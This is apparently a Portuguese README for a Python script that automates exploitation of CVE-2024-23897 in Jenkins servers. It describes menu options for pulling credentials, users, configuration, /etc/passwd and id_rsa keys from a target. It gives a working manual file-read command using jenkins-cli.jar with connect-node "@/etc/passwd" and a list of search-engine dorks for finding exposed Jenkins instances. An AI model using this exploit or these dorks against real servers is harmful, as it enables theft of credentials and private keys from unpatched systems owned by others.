
Um script feito em python para automatizar a vulnerabilidade CVE-2024-23897
Versões afetadas:
Um script em Python para automatizar a vulnerabilidade CVE-2024-23897 🤖 🛠️
Este código Python apresenta um scanner para uma vulnerabilidade específica (CVE-2024-23897) em servidores Jenkins. Começa solicitando ao usuário a URL do servidor Jenkins.
Em seguida, oferece a opção de baixar o arquivo "jenkins-cli.jar" necessário para interagir com Jenkins a partir da linha de comando. Depois, apresenta um menu de opções que inclui executar comandos como obter informações do servidor, do ambiente, de configuração do Jenkins, de usuários, de credenciais, bem como realizar leituras de arquivos sensíveis como "/etc/passwd", "/etc/os-release" e "id_rsa".
Uma vez selecionada uma opção do menu, o comando correspondente é executado no servidor Jenkins fornecido. O código está estruturado com funções para baixar o arquivo e executar os comandos, e uma função principal para gerenciar o fluxo do programa.
Execução para servidor Jenkins 📝:
python3 CVE-2024-23897-A-scaner.py
execução para servidor Jenkins EM DOCKER 📝:
python3 CVE-2024-23897-B-DOCKER-scaner.py
---------------------------------------------------------------------------------------------------------------------------------
execução manual.
1- baixar jenkins-cli.jar : http:///jnlpJars/jenkins-cli.jar
2- para realizar LFI, executar: java -jar jenkins-cli.jar -s http://172.17.0.2:8080/ -http connect-node "@/etc/passwd"
lista de dorks:
intitle:"Dashboard [Jenkins]" inurl:"/login"
intitle:"Jenkins" "Dashboard"
inurl:"/computer/" intitle:"Jenkins"
inurl:"/script" intitle:"Jenkins"
"Jenkins [Jenkins]" intitle:"Login"
intitle:"Jenkins" "Jenkins ver. 2.441"
inurl:"/manage" intitle:"Jenkins"
site:.com intitle:"Jenkins"
site:aws.amazon.com intitle:"Jenkins"
filetype:xml inurl:"jenkins/config.xml"